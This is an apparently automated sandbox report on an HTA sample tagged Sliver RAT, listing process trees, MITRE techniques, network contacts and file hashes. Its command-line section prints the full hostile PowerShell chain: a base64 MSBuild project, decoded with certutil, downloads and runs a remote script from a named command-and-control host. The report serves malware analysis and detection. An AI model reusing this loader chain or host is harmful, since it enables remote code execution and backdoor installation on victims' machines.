Malware Analysis Report

2024-11-13 13:23

Sample ID 241107-crt25askhx
Target 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta
SHA256 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
Tags
sliver backdoor defense_evasion discovery execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Threat Level: Known bad

The file 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta was found to be: Known bad.

Malicious Activity Summary

sliver backdoor defense_evasion discovery execution trojan

Sliver family

Sliver RAT v2

SliverRAT

Manipulates Digital Signatures

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Deobfuscate/Decode Files or Information

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-07 02:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 02:19

Reported

2024-11-07 02:21

Platform

win7-20240903-en

Max time kernel

118s

Max time network

148s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

Signatures

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2748 wrote to memory of 2768 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 2768 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 2768 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2748 wrote to memory of 2768 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2768 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2768 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2768 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2768 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\certutil.exe
PID 2768 wrote to memory of 2692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2768 wrote to memory of 2692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2768 wrote to memory of 2692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2768 wrote to memory of 2692 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
PID 2692 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2692 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2692 wrote to memory of 2872 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2872 wrote to memory of 1272 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2872 wrote to memory of 1272 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2872 wrote to memory of 1272 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2692 wrote to memory of 1736 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2692 wrote to memory of 1736 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2692 wrote to memory of 1736 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1736 wrote to memory of 2936 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1736 wrote to memory of 2936 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1736 wrote to memory of 2936 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2692 wrote to memory of 2944 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2692 wrote to memory of 2944 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2692 wrote to memory of 2944 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2944 wrote to memory of 2968 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2944 wrote to memory of 2968 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2944 wrote to memory of 2968 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml

C:\Windows\SysWOW64\certutil.exe

"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFA27.tmp" "c:\Users\Admin\AppData\Local\Temp\3y1bivfx\CSCC73DE90DF3FE46598A3F4938CE41537B.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAE2.tmp" "c:\Users\Admin\AppData\Local\Temp\3chag5h1\CSC473A7D4465454302B63FC1A2A078FC3.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2E.tmp" "c:\Users\Admin\AppData\Local\Temp\g1dxskcg\CSC3DDB26D312934F398C30737F68A1486.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 secure.cloudtechnologiesusa.com udp
US 23.239.28.166:8081 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:8080 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp
US 23.239.28.166:443 secure.cloudtechnologiesusa.com tcp

Files

\??\c:\windows\temp\enc3.txt

MD5 940ed0fa0b1fc8ed6fbf279ab67af56f
SHA1 da4b7c40029542659f025ae74fa0be0fb0fa473c
SHA256 731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686
SHA512 934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

memory/2692-5-0x000000013FE30000-0x000000013FE6E000-memory.dmp

memory/2692-6-0x0000000000540000-0x000000000055A000-memory.dmp

memory/2692-7-0x000000001B7F0000-0x000000001B94A000-memory.dmp

C:\windows\temp\d.xml

MD5 6c2a8d820d8d80182aacdc125399cd71
SHA1 51ccd1e0c3247bf24da813a1f660a367f8deefc8
SHA256 104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a
SHA512 c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

memory/2692-9-0x000000001C1F0000-0x000000001C312000-memory.dmp

memory/2692-10-0x000000001D030000-0x000000001D152000-memory.dmp

memory/2692-11-0x00000000022E0000-0x0000000002324000-memory.dmp

memory/2692-12-0x00000000023C0000-0x0000000002404000-memory.dmp

memory/2692-13-0x00000000023C0000-0x00000000023DA000-memory.dmp

memory/2692-14-0x000000001C1F0000-0x000000001C36A000-memory.dmp

memory/2692-15-0x000000001D160000-0x000000001D4C4000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.cmdline

MD5 598a2ad886ab485f646be09d6c03d299
SHA1 646e22650f6ec739dfa426c5fe4dd50653d40224
SHA256 1787820228785d0d09d7957ef85d778a1c45c9726f15d7e2cda56d7839d6feb3
SHA512 748105aa393c2fab7c2527d2ab45f6bba81b780b763411690fc807a9108184d4917879e1f29fef0eef9cecf1579ce865405bc9abc9d98a779e68299f2bedb304

\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.0.cs

MD5 4a4ff4a5e71cabe4864c862a697c1e27
SHA1 b95fb7438213c3ae9caf0e8b52bb301fefcddb56
SHA256 70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb
SHA512 7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

\??\c:\Users\Admin\AppData\Local\Temp\3y1bivfx\CSCC73DE90DF3FE46598A3F4938CE41537B.TMP

MD5 ea7f15b0cdb1719f37d3a28fd7517a38
SHA1 be3031cd65f650490d6fd1121f458e9ef58f9562
SHA256 bec78056e7ae5b2302e239413f4caa67df3b35283f1ab8ef281b277711b139aa
SHA512 e154ea5592ac4f426bfff3efe6e0f05c64ee6222b8dd7e595c8865b44bfbd5dd26a9683723d08e623f56d4440c5f1b641f833c25ba2477f3e11dffabcbfb04a1

C:\Users\Admin\AppData\Local\Temp\RESFA27.tmp

MD5 6057a3f2ca92de0ab2306decbc05ad9f
SHA1 ff4979644347518b3cf7ec9889ba20c811a51c74
SHA256 fb44bd10da2fd69a8e3de2ea1721f03c47b2d4c2be3c8f90ca227367cb4eb767
SHA512 3071e52dae57d724004ad34c4720f472bef7d72ec9211dd761ac3846a88c683106a7f1f3b3948d8a7b58c7b31bc0f7d46d1ba1cc35a70ac335e10a9f424bd812

C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.dll

MD5 871310a72720c7438be53ea245772876
SHA1 5bc1d5ac372d82a59b0a89f421a450e37bb2119e
SHA256 c9c401c7315a530d53850ea41dc54a22e0c1405dec710bb19ed8f176001e8b83
SHA512 2fcc749ae3c402f18746c872cdb917addbc748d5bd9afc64b35cf81ba160c68c44db01a0cdd3a087dfc9adb5b572fc69722a99eac8150f1596d726170cea08bf

C:\Users\Admin\AppData\Local\Temp\3y1bivfx\3y1bivfx.pdb

MD5 c7936299b9bfc29ce8394ce0b53691f8
SHA1 d9f9865049ec7ddc3ddda32aa994bb531f47b793
SHA256 a975ad2b4f961ce2d4cf9f815f9eec24c676cf97e60206aa825df191d7af3736
SHA512 bb9cff07cbb1d9c3d27babf5450b061d80a5d8d0e5e1087a7a5b66f8d5b6f8801890787cee5594af64059df627b246943d9cdb640caa1c0cd8a33378a82ad7eb

memory/2692-30-0x0000000002330000-0x0000000002338000-memory.dmp

memory/2692-32-0x000000001C1F0000-0x000000001C312000-memory.dmp

memory/2692-33-0x000000001DFA0000-0x000000001E282000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.cmdline

MD5 02d3f7f7044b4a1514c7761850fc3e36
SHA1 457a196c89f08e1a5cea4e4e21c1ffd1eed94301
SHA256 4837ffe0f77c00dfc6ebcce8ac96526c83c6330f325a4ba998ae2e3d63d04bf4
SHA512 196b47f2dac332088c2f9f01384187a7b9b619da79e1838a4b5e61218c914bc1dbb970acb676d21cf413f4285c400917428cba7f9815bb162796edf8660509c8

\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.0.cs

MD5 da1f4b7b1a87cc475dfa05923b6301a0
SHA1 0e2ff764c519bc8169b66437857f01e25676e343
SHA256 624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e
SHA512 d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

\??\c:\Users\Admin\AppData\Local\Temp\3chag5h1\CSC473A7D4465454302B63FC1A2A078FC3.TMP

MD5 1eb6a26487a14eab9ee8af9701a46c0f
SHA1 14c15c01139f83d4e536128438ef9850ee46e571
SHA256 54e79833a1daadfdd1fc07d31f1c20f4d2b94eec12fc4fa98f4010cb6a2bc133
SHA512 5fd337519a92525a89eba88e67fa5bf9f6d82035c6615f67c613d715768d03f2b4c22756e93caebeb5abd73b4ed2aac75762a1ceb7dfac6d2d642915a3b7c2f0

C:\Users\Admin\AppData\Local\Temp\RESFAE2.tmp

MD5 b3c0b5b8e367c2edc292dcd6e1ad5575
SHA1 42834fe78ff4a2ffb460d086c61de1315ff38eb1
SHA256 8669cc2a08b180c0568cb767e2401d75c9cd28e4bc00ba594a3971cdfae1e380
SHA512 2819c249f79e304ae0935e9c3f8f51e81056827e15a74a94ed6b1f2ba215584f401421d12d2b3e91adda2b289115aa25a2d8b849f6bb9f3b2b09595f562c6daa

C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.pdb

MD5 800e7d0afceab1832b10cdbc8d766b8c
SHA1 d966032b2f0f443bc1a907acc6be69d8170e2529
SHA256 925a5a5d3dd699b7752d6d7ca999ccb15ab18677a9633c15074969155286c619
SHA512 7ebdd4084a78562996dacb44e7291c1b7a5802ab039d4add67cf297fddfcd00152135fe5f661775d9f95d961c404fbc7c6584c76642f454095c7493a00840a9c

C:\Users\Admin\AppData\Local\Temp\3chag5h1\3chag5h1.dll

MD5 f141f55ec69dc14196a7af09d7e301ac
SHA1 c7e24dc33f39d117d7f1b9adb178ec8ddd050b63
SHA256 73ddda7e24b98c7bd2af45a0697e84dad5ffc43c24050b325160184840bf6b39
SHA512 39a80c757b29537ee761c249b5b9849cc424442288e82f8d7ca15d7259ce83bd9ec87ca1e20845512d1fac6818988cc7aa2dcc39ba5f0c9ee82e37dfa23fb3ca

memory/2692-48-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/2692-50-0x00000000023D0000-0x00000000023EC000-memory.dmp

memory/2692-51-0x00000000023F0000-0x0000000002438000-memory.dmp

memory/2692-52-0x000000001B290000-0x000000001B298000-memory.dmp

memory/2692-53-0x000000001BC30000-0x000000001BCD6000-memory.dmp

memory/2692-54-0x000000001B2A0000-0x000000001B2D4000-memory.dmp

memory/2692-55-0x000000001BCE0000-0x000000001BD2A000-memory.dmp

memory/2692-56-0x000000001BD70000-0x000000001BD86000-memory.dmp

memory/2692-57-0x000000001C1F0000-0x000000001C312000-memory.dmp

memory/2692-58-0x000000001C1F0000-0x000000001C312000-memory.dmp

memory/2692-59-0x000000001E490000-0x000000001E54A000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.cmdline

MD5 49bc501d29b390765419864216b3c7df
SHA1 274946ab93f73c2cf9bbf38fe27f1db270a8f592
SHA256 bd75a1738591f665506848423febbf7c0bd3d95bba2fe0eced60cd0aa502cfd3
SHA512 35c2dba913c61c7199c1da59567b2bec94175727975b45a937b9952bb1888037ac70f677cebd0e8b3819639b69a658df713c4672ae7db8068eac9f5435c8ab8b

\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.0.cs

MD5 9dc0e32c32d7b3cfd2f819d8c0e4c7a5
SHA1 267cb8f96e02e298033786efd8ee6d87a73418a3
SHA256 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac
SHA512 c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

\??\c:\Users\Admin\AppData\Local\Temp\g1dxskcg\CSC3DDB26D312934F398C30737F68A1486.TMP

MD5 68769b273edb517eacf49d9d80ebc82f
SHA1 96fc7c33e6c7cf3cd1b9d43c70ebf8c7ed5a8bdc
SHA256 cd7c756209e436658d93c5f634667f3ce741c2c3353210f37dadf4c2c8376882
SHA512 9ff7ff7c5159b194d511d69ad0728e06706c7855eef8cb952062ca37e541dd902030329def3c6bce385ab08b41b5cffbe94c8b36fc08375417071bfdb2d07d9d

C:\Users\Admin\AppData\Local\Temp\RESA2E.tmp

MD5 8146d6167d5d0e653f2af2c19b7d8153
SHA1 0ce33ea0f723f8d8ee8d8cf2ff1a2329b1d4764d
SHA256 c5ce212180e04d9f7543067387401ce45f394ae52a2962a16ab91c381fe844a3
SHA512 8924b1ecf200b6c4e6d4b353936b15f889c59d83364384a0a9872e8ef2c00a3e0cd73b5507249553bed04ff4f0468eb7b64a4addddaef997a020df24b93ab768

memory/2692-74-0x000000001B2E0000-0x000000001B2E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.pdb

MD5 c892f0ab44e3c63bed25aa8c1d518235
SHA1 778a74d58617189b9321f844e686a619f6f17a8c
SHA256 8f379d8196ab67bc7d50cf3ee0409fd38e3757e9d0b83142843dd3d5b9d91347
SHA512 e8934b7d5b39fb136f0e4e43d8c2e459580bd3d1208c1f5b24c95da0b309b63592ab8d1f86131a60f924e917c5eacf2e7916ce622c7c5907f580aa962d069611

C:\Users\Admin\AppData\Local\Temp\g1dxskcg\g1dxskcg.dll

MD5 2d4becbdf913f86a0b8b727c5efa6cd2
SHA1 656615a8165a445be69a271e8880debd4d68b3dd
SHA256 6ae336202037340b3510db3a520ba4afdda4e9cc8498cc916ce151457fbe535b
SHA512 1912992df9f3b41525cfdc8b80d9fa6213166ba1cc16036a7be53acac4bca217bae1f4a9750251276f03ad2e4a082e1fbd9de012410c3bb88b1f85b209bf0eaa

memory/2692-76-0x0000000020720000-0x000000002119B000-memory.dmp

memory/2692-77-0x0000000022120000-0x0000000022C04000-memory.dmp

memory/2692-78-0x0000000022120000-0x0000000022C04000-memory.dmp

memory/2692-80-0x0000000022120000-0x0000000022C04000-memory.dmp

memory/2692-79-0x0000000022120000-0x0000000022C04000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-07 02:19

Reported

2024-11-07 02:21

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

157s

Command Line

